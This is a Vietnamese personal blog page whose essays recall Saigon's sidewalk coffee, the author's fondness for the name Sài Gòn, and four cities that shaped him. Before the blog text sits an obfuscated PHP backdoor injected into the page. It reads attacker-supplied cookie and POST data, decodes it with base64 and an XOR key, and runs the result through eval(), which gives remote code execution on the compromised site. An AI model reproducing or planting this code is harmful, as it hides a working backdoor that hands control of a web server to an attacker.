$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> sài-gòn – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: sài-gòn

Sài Gòn của anh – Cafe bệt

Cafe bệt

Bạn anh ở Hà Nội vào đây nói, anh xin lỗi, anh lập lại nguyên văn, chứ anh thì không bao giờ chửi thề: đm, cái xứ đe’o gì mà toàn quán cafe là quán cafe.

Cô giáo lớp 1 của anh từng dạy rằng, hễ ai chửi thề thì người đó là người xấu.
Cô giáo lớp 2 của anh lại bảo, nên chọn người thật thà mà chơi.
Thế thì anh biết làm sao, phỏng ạ! Bởi câu nói trên của bạn anh là hoàn toàn đúng.

Cám ơn trời, anh không phải dân Nhân Văn, vì thế anh cực dốt viết những gì đi sâu, tận sâu vào văn hoá, phong tục, tập quán. Nhưng anh có cái miệng, vì vậy, anh nghĩ rằng anh có quyền gọi: Văn hoá cafe Sài Gòn.

Sài Gòn chi chít quán cafe, đủ mọi thể loại và phong cách. Có quán đánh vào sự trẻ trung, nhịp sống hiện đại, có quán tìm về không gian trầm mặc, cổ xưa. Có nơi mở jazz, nơi Tuấn Ngọc, nơi gào thét tiếng nhạc Rock chát chúa. Mỗi quán, à không, mỗi thể loại quán, đều góp phần tạo nên cái gọi là Văn hoá cafe Sài Gòn (mà anh đã nhắc ở trên). Tuy nhiên, cafe đặc biệt nhất, theo anh chính là cafe bệt.

Thực ra, không ai biết tên chính xác của cafe bệt là gì, bởi vì nó làm khỉ gì có tên. Chỉ là mỗi người một cách gọi, và bọn anh quen gọi nó như thế.
Cafe bệt nằm ở ngay công viên gì đấy trước Dinh Độc Lập, được chia theo vị trí thành bốn góc (mà có bạn gọi là 4 vùng chiến khu). Trong đó, góc anh hay ngồi nhất là góc đối diện ngay Nhà Thờ Đức Bà.

Nói về ý nghĩa cuộc sống này nọ thì nghe có vẻ triết lí quá – nếu nói theo nghĩa lịch sự, còn nói theo ngôn ngữ bình thường là: xạo bỏ mẹ. Nhưng đúng là, một buổi sáng, à, Sài Gòn này vẫn có khái niệm sáng sớm, nhưng không rõ ràng lắm. Có lẽ, khái niệm buổi sáng sớm của Sài Gòn nên là 7h sáng thì đúng hơn. Nhắc lại, tầm 7h sáng ngồi ở cafe bệt, nhâm nhi li cafe và ổ bánh mì (anh thề, chẳng ngon lành gì sất, nhưng ăn thích thích), và ngắm dòng người – xe chạy thoăn thoắt đủ mọi ngả, lâu lâu chau mày vì những tia nắng sớm mai xuyên qua kẽ lá, nhảy đùa nghịch trên khuôn mặt, cảm giác ấm áp nơi mái tóc chưa gội mấy ngày. Lúc đấy, nhìn lên bầu trời tươi tắn, không một gợn mây, phóng tầm mắt ra xa xíu nữa, bắt gặp vẻ cổ kích như mãi trường tồn với thời gian của nhà thờ Đức Bà, xen với vẻ hiện đại của toà nhà cao tầng Diamond Plaza với lớp kiếng phản chiếu hàng cây xanh – xanh ngắt, khẽ lẩm bẩm câu hát màu nắng hay là màu mắt em. Với anh, đấy đích thực là cảm giác an bình.

Những ngày anh chia tay với bạn gái, anh thực hiện lối sống khốn nạn một cách triệt để: tối ngủ sớm, sáng dậy đi bơi. Đi bơi xong, anh và thằng bạn hay phóng một mạch lên cafe bệt, chỉ đơn thuần là ngồi đó đọc báo giấy và ngắm cảnh, ngắm người. Không lâu đâu, chỉ cần 30′ thôi, rồi cũng lại nhập vào cái dòng xoay hối hả ấy. Nhưng như thế đã là quá hoàn hảo để bắt đầu một ngày mới…

Cảm giác an bình mà hiếm hoi anh tìm được ở Sài Gòn của anh chính là nơi Cafe bệt.

B.l.u.e

p/s: ảnh của kylin nguồn từ Diễn đàn tin học.

Sài Gòn của anh

Sài Gòn xưa

Anh thích cái tên Sài Gòn hơn Thành phố Hồ Chí Minh.

Thật ra chẳng liên quan gì đến lí do chính trị này nọ. Đơn giản là vì từ hồi nhỏ, tầm mỗi tháng một lần, cứ buổi tối, lại có một thằng bé rất đáng yêu, với đôi mắt đen to tròn lay láy (là anh đới), đứng tựa cửa chờ mẹ “đi Sài Gòn” về. Khi đấy, đối với những đứa trẻ nhà quê như anh, thì “đi Sài Gòn” là một việc gì lớn lao lắm. Nó khác hẳn so với việc bọn anh hằng ngày vừa đi vừa chạy nhảy, cười nói líu lo trên con đường làng. Chính vì thế, hai chữ “Sài Gòn” nó có gì đó rất đặc biệt trong anh. Nó có thể là một phần niềm mơ ước thời còn niên thiếu, hoặc giả là những gì hiếm hoi còn sót lại mà anh có thể nhớ, để lâu lâu nhấp miếng trà và tặc lưỡi nói rằng: “Ngày đấy, anh thường hay nghĩ tới…”

Những người dân nơi đây cũng có rất nhiều người thích hai tiếng Sài Gòn. Đó đa phần là những người mà kí ức đẹp nhất gắn với vùng đất được mệnh danh “hòn ngọc Viễn Đông” trước năm 1975. So với lí do của họ, thì có vẻ anh hơi buồn cười nhỉ. Đúng kiểu em chã, uỷ mị, thơ với chả ấu, thằng vẽ chuyện, anh biết sẽ có đứa ác mồm ác miệng bảo thế. Nhưng kệ, anh cứ thích.

Anh chưa từng tự hỏi chính anh: Cái tình cảm thực sự của anh đối với Sài Gòn là gì? Chỉ đơn giản là một vùng đất nơi anh ở, hay nó là một phần trong anh?

Sài Gòn chẳng là của riêng ai. Nhưng khi anh đặt tiêu đề Sài Gòn của anh, ấy là anh đang muốn đề cập tới những cảm xúc về Sài Gòn qua cái nhìn của anh. Đó có thể là một góc nhìn đầy sần sùi, gai góc, sặc mùi tiêu cực; đó cũng có thể là một cái nhìn thật nhẹ, thật mông lung và huyền ảo. Đó có thể là cái nhìn được nhuộm một màu xám nhàn nhạt của quá khứ; hoặc giả là những màu sắc rõ nét nhất mà dòng thời gian – đang – tuôn – chảy dệt nên nó… Chỉ có một điều chắc chắn, anh nhắc lại, đó sẽ là cái nhìn của riêng anh..

Em còn nhớ hay em đã quên?

Em còn nhớ hay em đã quên?

Ở Việt Nam này, có bốn thành phố để lại trong anh những cung bậc cảm xúc khác nhau.

Đó là Vũng Tàu – nơi anh sinh ra và lớn lên, những kí ức của một thời niên thiếu đầy hiếu động nhưng cũng thật đẹp, thật an bình của anh nằm ở đó. Những gì cốt lõi tạo nên một anh – như – bây – giờ cũng nằm nơi đó…
Đó là Sài Gòn – nơi hiện tại anh đang sống. Nó đi cùng cái tuổi trưởng thành của anh. Anh không diễn tả được cảm xúc của anh với nó, chỉ biết rằng nó thân quen như chính một phần máu thịt của anh…
Đó là Hà Nội – một người tình trong mộng ảo của anh. Hà Nội anh yêu là một Hà Thành với những nét đẹp như trong tranh vẽ, là một Hà Thành với vẻ run rẩy của hàng dương liễu mọc quanh hồ Trúc Bạch, một Hà – Nội – dáng – kiều – thơm ((Tây Tiến – Quang Dũng)), một Hà Nội – hàng phố cũ rêu phong, từng mái ngói xô nghiêng, nao nao kỷ niệm ((Em ơi Hà Nội phố – Phan Vũ)). Và giờ đây, quan trọng hơn hết, một Hà Nội – em…
Đó là Đà Lạt – nơi anh chỉ mới đặt chân đến hai lần. Mỗi lần chỉ ở lại tầm ba ngày. Lần đầu không ấn tượng bao nhiêu thì lần sau lại sâu đậm bấy nhiêu. Nó là chút gì còn ít ỏi mà anh bám víu lại, để nhớ về một thời hạnh phúc, thật sự rất hạnh phúc của anh. Đà Lạt, cùng những kỉ niệm về nó, tựa như một thứ ma tuý đầy quyến rũ, mộng ảo, khiến anh không thể nào dứt ra được. Nó quện cứng vào tâm trí anh, nó làm trí óc anh vui, nhưng lại khiến con tim anh đau…

Anh sẽ viết lần lượt về bốn thành phố này…
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.